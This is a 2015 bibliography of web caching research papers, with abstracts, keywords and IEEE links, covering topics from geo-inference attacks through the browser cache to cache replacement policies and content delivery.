Web Caching 2015 |
Web caches offer a potential for mischief. With the expanded need for caching capability with the cloud and mobile communications, the need for more and better security has also grown. The articles cited here address cache security issues including geo-inference attacks, scriptless timing attacks, and a proposed incognito tab. Other research on caching generally is cited. These articles appeared in 2015.
Panja, B.; Gennarelli, T.; Meharia, P., “Handling Cross Site Scripting Attacks Using Cache Check to Reduce Webpage Rendering Time with Elimination of Sanitization and Filtering in Light Weight Mobile Web Browser,” in Mobile and Secure Services (MOBISECSERV), 2015 First Conference on, vol., no., pp. 1–7, 20–21 Feb. 2015. doi:10.1109/MOBISECSERV.2015.7072878
Abstract: In this paper we propose a new approach to prevent and detect potential cross-site scripting attacks. Our method called Buffer Based Cache Check, will utilize both the server-side as well as the client-side to detect and prevent XSS attacks and will require modification of both in order to function correctly. With Cache Check, instead of the server supplying a complete whitelist of all the known trusted scripts to the mobile browser every time a page is requested, the server will instead store a cache that contains a validated “trusted” instance of the last time the page was rendered that can be checked against the requested page for inconsistencies. We believe that with our proposed method that rendering times in mobile browsers will be significantly reduced as part of the checking is done via the server, and fewer checking within the mobile browser which is slower than the server. With our method the entire checking process isn’t dumped onto the mobile browser and as a result the mobile browser should be able to render pages faster as it is only checking for “untrusted” content whereas with other approaches, every single line of code is checked by the mobile browser, which increases rendering times.
Keywords: cache storage; client-server systems; mobile computing; online front-ends; security of data; trusted computing; Web page rendering time; XSS attacks; buffer based cache check; client-side; cross-site scripting attacks; filtering; light weight mobile Web browser; sanitization; server-side; trusted instance; untrusted content; Browsers; Filtering; Mobile communication; Radio access networks; Rendering (computer graphics); Security; Servers; Cross site scripting; cache check; mobile browser; webpage rendering (ID#: 15-7179)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7072878&isnumber=7072857
Basile, C.; Lioy, A., “Analysis of Application-Layer Filtering Policies with Application to HTTP,” in Networking, IEEE/ACM Transactions on, vol. 23, no.1, pp. 28–41, Feb. 2015. doi:10.1109/TNET.2013.2293625
Abstract: Application firewalls are increasingly used to inspect upper-layer protocols (as HTTP) that are the target or vehicle of several attacks and are not properly addressed by network firewalls. Like other security controls, application firewalls need to be carefully configured, as errors have a significant impact on service security and availability. However, currently no technique is available to analyze their configuration for correctness and consistency. This paper extends a previous model for analysis of packet filters to the policy anomaly analysis in application firewalls. Both rule-pair and multirule anomalies are detected, hence reducing the likelihood of conflicting and suboptimal configurations. The expressiveness of this model has been successfully tested against the features of Squid, a popular Web caching proxy offering various access control capabilities. The tool implementing this model has been tested on various scenarios and exhibits good performance.
Keywords: Internet; authorisation; firewalls; transport protocols; HTTP; Squid Web caching proxy; access control capabilities; application firewalls; application-layer filtering policies; multirule anomalies; packet filters; policy anomaly analysis; rule-pair anomalies; service security; upper-layer protocols; Access control; Analytical models; IEEE transactions; IP networks; Logic gates; Protocols; Application gateway; firewall; policy anomalies; policy conflicts; proxy; regular expressions (ID#: 15-7180)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6690252&isnumber=7041254
Gerbet, Thomas; Kumar, Amrit; Lauradoux, Cedric, “The Power of Evil Choices in Bloom Filters,” in Dependable Systems and Networks (DSN), 2015 45th Annual IEEE/IFIP International Conference on, vol., no., pp. 101–112, 22–25 June 2015. doi:10.1109/DSN.2015.21
Abstract: A Bloom filter is a probabilistic hash-based data structure extensively used in software including online security applications. This paper raises the following important question: Are Bloom filters correctly designed in a security context? The answer is no and the reasons are multiple: bad choices of parameters, lack of adversary models and misused hash functions. Indeed, developers truncate cryptographic digests without a second thought on the security implications. This work constructs adversary models for Bloom filters and illustrates attacks on three applications, namely SCRAPY web spider, BITLY DABLOOMS spam filter and SQUID cache proxy. As a general impact, filters are forced to systematically exhibit worst-case behavior. One of the reasons being that Bloom filter parameters are always computed in the average case. We compute the worst-case parameters in adversarial settings, show how to securely and efficiently use cryptographic hash functions and propose several other countermeasures to mitigate our attacks.
Keywords: Complexity theory; Cryptography; Data structures; Electronic mail; Indexes; Software; Bloom filters; Denial-of-Service; Digest truncation; Hash functions; Pre-image attack (ID#: 15-7181)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7266842&isnumber=7266818
Yaoqi Jia; Xinshu Dong; Zhenkai Liang; Saxena, P., “I Know Where You’ve Been: Geo-Inference Attacks via the Browser Cache,” in Internet Computing, IEEE, vol. 19, no.1, pp. 44–53, Jan–Feb. 2015. doi:10.1109/MIC.2014.103
Abstract: To provide more relevant content and better responsiveness, many websites customize their services according to users’ geolocations. However, if geo-oriented websites leave location-sensitive content in the browser cache, other sites can sniff that content via side channels. The authors’ case studies demonstrate the reliability and power of geo-inference attacks, which can measure the timing of browser cache queries and track a victim’s country, city, and neighborhood. Existing defenses cannot effectively prevent such attacks, and additional support is required for a better defense deployment.
Keywords: Web sites; cache storage; geography; online front-ends; browser cache; geo-inference attacks; geo-oriented Websites; side channels; Browsers; Cache memory; Content management; Geography; Google; Internet; Mobile radio management; Privacy; Web browsers; Web technologies; security and privacy protection (ID#: 15-7182)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6879050&isnumber=7031813
Qiao, Xiuquan.; Chen, Jun-Liang.; Tan, Wei.; Dustdar, Schahram., “Service Provisioning in Content-Centric Networking: Challenges, Opportunities, and Promising Directions,” in Internet Computing, IEEE, vol., no. 99, vol., no., pp.1–1. doi:10.1109/MIC.2015.116
Abstract: With the evolution of Internet applications, contemporary IP-based Internet architecture increasingly finds itself not capable to meet the demands of current network usage patterns. Content-Centric Networking (CCN), as a clean-slate future network architecture, is different from existing IP networks, and has some salient features such as in-network caching, name-based routing, friendly mobility and built-in security. This new architecture has a profound impact on how to provision Internet applications. Here, from the perspective of upper-layer applications, we discuss four challenges and three opportunities regarding service provisioning in CCN. We describe an approach called Service Innovation Environment for Future Internet (SIEFI) that addresses challenges while exploits opportunities for the future of CCN.
Keywords: Computer architecture; IP networks; Routing; Technological innovation; Web servers (ID#: 15-7183)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7239513&isnumber=5226613
Lee, R.B., “Rethinking Computers for Cybersecurity,” in Computer, vol. 48, no.4, pp.16–25, Apr. 2015. doi:10.1109/MC.2015.118
Abstract: Cyberattacks are growing at an alarming rate, even as our dependence on cyberspace transactions increases. Our software security solutions may no longer be sufficient. It is time to rethink computer design from the foundations. Can hardware security be enlisted to improve cybersecurity? The author discusses two classes of hardware security: hardware-enhanced security architectures for improving software and system security, and secure hardware. The Web extra at https://youtu.be/z-c9ACviGNo is a video of a 2006 invited seminar at the Naval Postgraduate School, in which author Ruby B. Lee presents the Secret-Protected (SP) architecture, which is a minimalist set of hardware features that can be added to any microprocessor or embedded processor that protects the “master secrets” that in turn protect other keys and encrypted information, programs and data.
Keywords: security of data; computer design; cybersecurity; cyberspace transactions; hardware security; hardware-enhanced security architectures; software security improvement; system security improvement; Access control; Computer architecture; Computer crime; Computer security; Cryptography; Cloud; SaaS; computer architecture; cryptography; data access control; hackers; secure caches; security; self-protecting data; trusted software (ID#: 15-7184)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7085648&isnumber=7085638
Aghaei-Foroushani, V.; Zincir-Heywood, A.N., “A Proxy Identifier Based on Patterns in Traffic Flows,” in High Assurance Systems Engineering (HASE), 2015 IEEE 16th International Symposium on, vol., no., pp. 118–125, 8–10 Jan. 2015. doi:10.1109/HASE.2015.26
Abstract: Proxies are used commonly on today’s Internet. On one hand, end users can choose to use proxies for hiding their identities for privacy reasons. On the other hand, ubiquitous systems can use it for intercepting the traffic for purposes such as caching. In addition, attackers can use such technologies to anonymize their malicious behaviours and hide their identities. Identification of such behaviours is important for defense applications since it can facilitate the assessment of security threats. The objective of this paper is to identify proxy traffic as seen in a traffic log file without any access to the proxy server or the clients behind it. To achieve this: (i) we employ a mixture of log files to represent real-life proxy behavior, and (ii) we design and develop a data driven machine learning based approach to provide recommendations for the automatic identification of such behaviours. Our results show that we are able to achieve our objective with a promising performance even though the problem is very challenging.
Keywords: Internet; data privacy; pattern recognition; telecommunication traffic; ubiquitous computing; Internet; log files; malicious behaviours; patterns; privacy reasons; proxy identifier; real-life proxy behavior; security threats; traffic flows; ubiquitous systems; Cryptography; Delays; IP networks; Probes; Web servers; Behavior Analysis; Network Security; Proxy; Traffic Flow (ID#: 15-7185)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7027422&isnumber=7027398
Gillman, D.; Yin Lin; Maggs, B.; Sitaraman, R.K., “Protecting Websites from Attack with Secure Delivery Networks,” in Computer, vol. 48, no.4, pp. 26–34, Apr. 2015. doi:10.1109/MC.2015.116
Abstract: Secure delivery networks can help prevent or mitigate the most common attacks against mission-critical websites. A case study from a leading provider of content delivery services illustrates one such network’s operation and effectiveness. The Web extra at https://youtu.be/4FRRI0aJLQM is an overview of the evolving threat landscape with Akamai Director of Web Security Solutions Product Marketing, Dan Shugrue. Dan also shares how Akamai’s Kona Site Defender service handles the increasing frequency, volume and sophistication of Web attacks with a unique architecture that is always on and doesn’t degrade performance.
Keywords: Web sites; security of data; Web attacks; Website protection; content delivery services; mission-critical Websites; secure delivery networks; Computer crime; Computer security; Firewalls (computing); IP networks; Internet; Protocols; Akamai Technologies; DDoS attacks; DNS; Domain Name System; Internet/Web technologies; Operation Ababil; SQL injection; WAF; Web Application Firewall; XSS; cache busting; cross-site scripting; cybercrime; distributed denial-of-service attacks; distributed systems; floods; hackers; security (ID#: 15-7186)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7085639&isnumber=7085638
Jin, Yong; Fujikawa, Kenji; Harai, Hiroaki; Ohta, Masataka, “Secure Glue: A Cache and Zone Transfer Considering Automatic Renumbering,” in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, vol.2, no., pp. 393–398, 1-5 July 2015. doi:10.1109/COMPSAC.2015.38
Abstract: Domain Name System (DNS) is the most widely used name resolution system for computers and services in the Internet. The number of domain name registrations is reaching 276 million across all top level domains (TLDs) today and the DNS query count is increasing year over year. The main reason of the high DNS query count is the increase of out-of-bailiwick domain name delegation since it (NS without glue A record) makes the client send extra DNS queries for the glue A record. On the other hand, the master/slave model is not compatible with address renumbering in DNS since the master is indicated by its IP address in the slave. Thus it is necessary to redesign the current DNS protocol considering lower name resolution latency as well as the enhancement of automatic convergence after the address renumbering for the effective and sustained name resolution service. In this paper, we propose two mechanisms: one is the secure glue A cache and update to reduce the name resolution latency by cutting the DNS query count with low security risk, the other is the automatic zone transfer which automatically recovers the DNS based on FQDN (Fully Qualified Domain Name) after address renumbering. We successfully implemented the prototype in Linux as an extended form of BIND (Berkeley Internet Name Domain). The evaluation results confirmed approximately 25% down of the DNS query count and the successful automatic DNS recovery after address renumbering.
Keywords: IP networks; Protocols; Prototypes; Semiconductor optical amplifiers; Servers; Web and internet services; Automatic address renumbering; DNS; Glue A; Out-of-bailiwick; Zone transfer (ID#: 15-7187)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273645&isnumber=7273573
Nakano, Yuusuke; Kamiyama, Noriaki; Shiomoto, Kohei; Hasegawa, Go; Murata, Masayuki; Miyahara, Hideo, “Web Performance Acceleration by Caching Rendering Results,” in Network Operations and Management Symposium (APNOMS), 2015 17th Asia-Pacific, vol., no., pp. 244–249, 19–21 Aug. 2015. doi:10.1109/APNOMS.2015.7275434
Abstract: Web performance, the time from clicking a link on a web page to finishing displaying the web page of the link, is becoming increasingly important. Low web performance of web pages tends to result in the loss of customers. In our research, we measured the time for downloading files on popular web pages by running web browsers on four hosts worldwide using PlanetLab and detected the longest portion in download time. We found the longest portion in download time to be Blocked time, which is the waiting time for the start of downloading in web browsers. In this paper, we propose a method for accelerating web performance by reducing such Blocked time with a cache of rendering results. The proposed method uses an in-network rendering function which renders web pages instead of web browsers. The in-network rendering function also stores the rendering results in its cache and reuses them for other web browsers to reduce the Blocked time. To evaluate the proposed method, we calculated the web performance of web pages whose render results are cached by analyzing the measured download time of actual web pages. We found that the proposed method accelerates web performance of long round trip time (RTT) web pages or long RTT clients if the web pages’ dynamic file percentages are within 80%.
Keywords: Acceleration; Browsers; Rendering (computer graphics);Time measurement; Web pages; Web servers (ID#: 15-7188)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275434&isnumber=7275336
Chuanfei Xu; Bo Tang; Man Lung Yiu, “Diversified Caching for Replicated Web Search Engines,” in Data Engineering (ICDE), 2015 IEEE 31st International Conference on, vol., no., pp. 207–218, 13–17 April 2015. doi:10.1109/ICDE.2015.7113285
Abstract: Commercial web search engines adopt parallel and replicated architecture in order to support high query throughput. In this paper, we investigate the effect of caching on the throughput in such a setting. A simple scheme, called uniform caching, would replicate the cache content to all servers. Unfortunately, it does not exploit the variations among queries, thus wasting memory space on caching the same cache content redundantly on multiple servers. To tackle this limitation, we propose a diversified caching problem, which aims to diversify the types of queries served by different servers, and maximize the sharing of terms among queries assigned to the same server. We show that it is NP-hard to find the optimal diversified caching scheme, and identify intuitive properties to seek good solutions. Then we present a framework with a suite of techniques and heuristics for diversified caching. Finally, we evaluate the proposed solution with competitors by using a real dataset and a real query log.
Keywords: cache storage; query processing; search engines; NP-hard; optimal diversified caching scheme; parallel architecture; real query log; replicated Web search engines; replicated architecture; Computer architecture; Indexes; Search engines; Servers; Silicon; Throughput; Training (ID#: 15-7189)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7113285&isnumber=7113253
Bangar, P.; Singh, K.N., “Investigation and Performance Improvement of Web Cache Recommender System,” in Futuristic Trends on Computational Analysis and Knowledge Management (ABLAZE), 2015 International Conference on, vol., no., pp. 585–589, 25–27 Feb. 2015. doi:10.1109/ABLAZE.2015.7154930
Abstract: A number of large and small scale applications are developed now in these days for fulfilling the users need. In recent years the Web based applications are also growing rapidly. Due to this the network performance is affected and browsing experience becomes slow. Thus performance improvement of traditional browsing and prefetching techniques are required, by which the application speed is optimized and delivers the high performance Web pages. Thus, in this paper pre-fetching techniques are investigated, and for cache replacement a recommendation system is developed. In order to design recommendation engine a promising data model is find in [6]. The given system utilizes the proxy access log for data analysis. The main advantage of proxy access log, it contains entire navigations of Web pages by a targeted user. This data model offers high performance outcomes. But computational complexity is not much adoptable. Thus the traditional data model is modified using a new scheme, where the K-mean algorithm is applied for user data personalization. Then after ID3 algorithm is used, for learning the user navigation patterns and KNN and probability theory is utilized for predicting the upcoming Web URLs for pre-fetching. The proposed data model is implemented using visual studio framework and the performance of the system are evaluated and compared in terms of memory used, time consumption, accuracy and error rate. According to the obtained results the proposed predictive system offers high performance results as compared to the traditional data model.
Keywords: cache storage; data models; learning (artificial intelligence); probability; recommender systems; ID3 algorithm; K-mean algorithm; KNN; Web URL prediction; Web based applications; Web cache recommender system; Web pages; accuracy analysis; browsing experience; browsing technique; cache replacement; computational complexity; data analysis; data model; error rate; memory consumption; network performance; performance evaluation; performance improvement; predictive system; prefetching technique; probability theory; proxy access log; recommendation engine design; time consumption; user data personalization; user navigation pattern learning; visual studio framework; Accuracy; Algorithm design and analysis; Data mining; Data models; Error analysis; Memory management; Prediction algorithms; ID3; K-means; caching; pre-fetching (ID#: 15-7191)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7154930&isnumber=7154914
Johnson, T.A.; Seeling, P., “Browsing the Mobile Web: Device, Small Cell, and Distributed Mobile Caches,” in Communication Workshop (ICCW), 2015 IEEE International Conference on, vol., no., pp.1025–1029, 8–12 June 2015. doi:10.1109/ICCW.2015.7247311
Abstract: The increasing amounts of data requested by mobile client devices has given rise to broad research endeavors to determine how network providers can cope with this challenge. Based on real world data used to derive upper limits of web page complexity, we provide an evaluation of web browsing and localized caching approaches. In this paper, we employ two different user-browsing models for (i) individual mobile clients, (ii) mobile clients sharing one centralized small cell cache, and (iii) mobile clients operating in an energy-optimized co-located fashion. We find that for a given content popularity distribution, average group savings due to caching depend highly on the user model. Furthermore, we find that for the purpose of overall savings determinations, an aggregated virtual cache falls within less than ten percent of a more elaborate energy-conscious approach to caching.
Keywords: Internet; cellular radio; mobile computing; Web page complexity; aggregated virtual cache; centralized small cell cache; content popularity distribution; distributed mobile caches; energy-conscious approach; energy-optimized colocated fashion; group savings; localized caching approaches; mobile Web; mobile client devices; mobile clients sharing; network providers; real world data; user-browsing models; Conferences; Data models; Joints; Mobile communication; Mobile computing; Mobile handsets; Web pages; Cooperative communications; Green mobile communications; Mobile communications; Mobile cooperative applications (ID#: 15-7192)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7247311&isnumber=7247062
Matsushita, Kazuki; Nishimine, Masashi; Ueda, Kazunori, “Cooperative Cache Distribution System for Virtual P2P Web Proxy,” in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual , vol.3, no., pp. 646–647, 1–5 July 2015. doi:10.1109/COMPSAC.2015.147
Abstract: Recent years, data transfer via www is one of the most popular application and web traffic on the Internet consumes much network resources. We have proposed a peer-to-peer cache distribution system to reduce consumption of network resources so far. Systems based on our proposal enable peers to receive a part of the data while the peers are downloading data from a server. In this paper, we report further extensions for implementation on web browser as plug-in software.
Keywords: Computers; Conferences; Multimedia communication; Peer-to-peer computing; Protocols; Servers; Software (ID#: 15-7193)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273447&isnumber=7273299
Khandekar, A.A.; Mane, S.B., “Analyzing Different Cache Replacement Policies on Cloud,” in Industrial Instrumentation and Control (ICIC), 2015 International Conference on, vol., no., pp. 709–712, 28–30 May 2015. doi:10.1109/IIC.2015.7150834
Abstract: Today, Caching is considered to be the key technology which bridges the performance gap between memory hierarchies through spatial or temporal localities. Particularly, in disk storage system, it has a prominent effect. To get a higher performance in operating systems, Databases and World Wide Web caching is considered as one of the major steps in system design. In cloud systems, heavy I/O activities are associated with different applications. Due to heavy I/O activities, performance is degrading. If caching is implemented, these applications would be benefited the most. For enhancing the system performance various cache replacement policies have been proposed and implemented and these algorithms defines the enhancement factor and plays a major role in modifying the efficiency of the system. Different caching policies have different effects on the system performance. However, the traditional cache replacement algorithms are not easily applicable to web applications. As the demand for web services is increasing, there is a need to reduce the download time and Internet traffic. To avoid the case of cache saturation and make the caching effective, an informative decision has to be made as to which documents are to be evicted from the cache effectively. This paper gives comparison of different cache replacement policies in traditional system as well as in web applications and proposes a system which implements LRU and CERA caching algorithms and gives it’s performance evaluation.
Keywords: Web services; cache storage; cloud computing; operating systems (computers); storage management; telecommunication traffic; I/O; Internet traffic; Web services; World Wide Web; cache replacement policies; cloud; databases; disk storage system; memory hierarchies; operating systems; spatial localities; temporal localities; Algorithm design and analysis; Cloud computing; Computers; Performance evaluation; Servers; System performance (ID#: 15-7194)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7150834&isnumber=7150576
Ahmed, S.T.; Loguinov, D., “Modeling Randomized Data Streams in Caching, Data Processing, and Crawling Applications,” in Computer Communications (INFOCOM), 2015 IEEE Conference on, vol., no., pp. 1625–1633, April 26 2015–May 1 2015. doi:10.1109/INFOCOM.2015.7218542
Abstract: Many BigData applications (e.g., MapReduce, web caching, search in large graphs) process streams of random key-value records that follow highly skewed frequency distributions. In this work, we first develop stochastic models for the probability to encounter unique keys during exploration of such streams and their growth rate over time. We then apply these models to the analysis of LRU caching, MapReduce overhead, and various crawl properties (e.g., node-degree bias, frontier size) in random graphs.
Keywords: Big Data; cache storage; information retrieval; parallel processing; stochastic processes; Big Data applications; LRU caching; MapReduce overhead; caching application; crawl properties; crawling application; data processing; frequency distribution; probability; random graphs; randomized data streams; stochastic model; Analytical models; Computational modeling; Computers; Conferences; Random variables; Stochastic processes; Yttrium (ID#: 15-7195)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7218542&isnumber=7218353
Ahammad, P.; Gaunker, R.; Kennedy, B.; Reshadi, M.; Kumar, K.; Pathan, A.K.; Kolam, H., “A Flexible Platform for QoE-Driven Delivery of Image-Rich Web Applications,” in Multimedia and Expo (ICME), 2015 IEEE International Conference on, vol., no.,
pp. 1–6, June 29 2015–July 3 2015. doi:10.1109/ICME.2015.7177516
Abstract: The advent of content-rich modern web applications, unreliable network connectivity and device heterogeneity demands flexible web content delivery platforms that can handle the high variability along many dimensions — especially for the mobile web. Images account for more than 60% of the content delivered by present-day webpages and have a strong influence on the perceived webpage latency and end-user experience. We present a flexible web delivery platform with a client-cloud architecture and content-aware optimizations to address the problem of delivering image-rich web applications. Our solution makes use of quantitative measures of image perceptual quality, machine learning algorithms, partial caching and opportunistic client-side choices to efficiently deliver images on the web. Using data from the WWW, we experimentally demonstrate that our approach shows significant improvement on various web performance criteria that are critical for maintaining a desirable end-user quality-of-experience (QoE) for image-rich web applications.
Keywords: Internet; cloud computing; image processing; learning (artificial intelligence); mobile computing; quality of experience; QoE-driven delivery; Web performance criteria; client-cloud architecture; content-aware optimizations; content-rich modern Web applications; end-user experience; end-user quality-of-experience; flexible Web content delivery platforms; image perceptual quality; image-rich Web applications; machine learning algorithms; mobile Web; opportunistic client-side choices; partial caching; perceived Web page latency; Browsers; Image coding; Mobile communication; Optimization; Servers; Streaming media; Transcoding; Content-aware performance optimization; Multimedia web applications; Quality of Experience; Web delivery service (ID#: 15-7196)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7177516&isnumber=7177375
Herrero Agustin, J.L., “Model-Driven Web Applications,” in Science and Information Conference (SAI), 2015, vol., no.,
pp. 954–964, 28–30 July 2015. doi:10.1109/SAI.2015.7237258
Abstract: With the evolution of web 2.0 and the appearance of AJAX technology a new breed of applications for the Web has emerged. However, the low reusability degree achieved and high development costs are the main problems identified in this domain. Another important issue that must be taken into consideration is that the performance degree of this type of applications is drastically affected by latency, since they must be downloaded before they can be used. Therefore, it becomes essential to boost a software development approach to attenuate these problems. This is the reason why this paper proposes a model-driven architecture for developing web applications. Towards this end, the following tasks have been developed: first a new profile extends UML and introduces web concepts at design level, then a new framework supports web application development according to the component-based methodology, and finally a transformation model is proposed to generate the final code semi-automatically. Another contribution of this work is the definition of a cache and a prefetching protocol to reduce latency and provide high performance web applications.
Keywords: Internet; object-oriented programming; software engineering; storage management; AJAX technology; UML; cache protocol; component-based methodology; high performance Web applications; model-driven Web applications; prefetching protocol; software development approach; Browsers; Cities and towns; Computational modeling; Data models; Proposals; Unified modeling language; Web services; AJAX; component-based software engineering; model-driven architecture; rich internet applications; web applications (ID#: 15-7197)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7237258&isnumber=7237120
Horiuchi, A.; Saisho, K., “Development of Scaling Mechanism for Distributed Web System,” in Software Engineering, Artificial Intelligence, Networking and Parallel/Distributed Computing (SNPD), 2015 16th IEEE/ACIS International Conference on, vol., no., pp. 1–6, 1–3 June 2015. doi:10.1109/SNPD.2015.7176214
Abstract: Progress of virtualization technology in recent years made it easy to build cache server in the Cloud. It became possible to increase Web service capacity using virtual cache servers. However, expected responsiveness can not be gained with insufficient cache servers against load. In contrast, costs will increase by surplus resources with too many cache servers against load. Therefore, we have been developing a distributed Web system suitable for the Cloud adjusting the number of Web servers according to load of them to reduce running cost. This research aims to implement the scaling mechanism for the distributed Web system. It has three functions: load monitoring function, cache server management function and destination setting function. This paper describes these functions and evaluation of the prototype of scaling mechanism.
Keywords: cache storage; cloud computing; distributed processing; virtualisation; Web service capacity; cache server management function; destination setting function; distributed Web system; load monitoring function; scaling mechanism; scaling mechanism development; virtual cache servers; virtualization technology; Load management; Mirrors; Monitoring; Time factors; Time measurement; Web servers; Auto Scaling; Cache Server; Cloud; Load Balancing (ID#: 15-7198)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7176214&isnumber=7176160
Polonia, P.V.; Bier Melgarejo, L.F.; Hering de Queiroz, M., “A Resource Oriented Architecture for Web-Integrated SCADA Applications,” in Factory Communication Systems (WFCS), 2015 IEEE World Conference on, vol., no., pp. 1–8, 27–29 May 2015. doi:10.1109/WFCS.2015.7160563
Abstract: Supervisory Control and Data Acquisition (SCADA) systems are widely used on industry and public utility services to gather information from field devices and to control and monitor processes. The adoption of Internet technologies in automation have brought new opportunities and challenges for industries, establishing the need to integrate information from various sources on the Web. This paper exposes the design and implementation of a Resource Oriented Architecture for typical SCADA applications based on the architectural principles of the Representational State Transfer (REST) architectural style. The application to a didactic Flexible Manufacturing Cell illustrates how SCADA can take advantage of the interoperability afforded by open Web technologies, interact with a wide range of systems and leverage from the existing Web infrastructure, such as proxies and caches.
Keywords: Internet; SCADA systems; cellular manufacturing; control engineering computing; flexible manufacturing systems; open systems; process control; production engineering computing; software architecture; Internet technologies; REST; Web-integrated SCADA applications; caches; didactic flexible manufacturing cell; field devices; industry services; information gathering; information integration; interoperability; open Web technologies; process control; process monitoring; proxies; public utility services; representational state transfer architectural style; resource oriented architecture; supervisory control-and-data acquisition systems; Computer architecture; Protocols; SCADA systems; Scalability; Servers; Service-oriented architecture; Industry 4.0; M2M; REST; ROA; SCADA; WEB (ID#: 15-7199)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160563&isnumber=7160536
Note:
Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.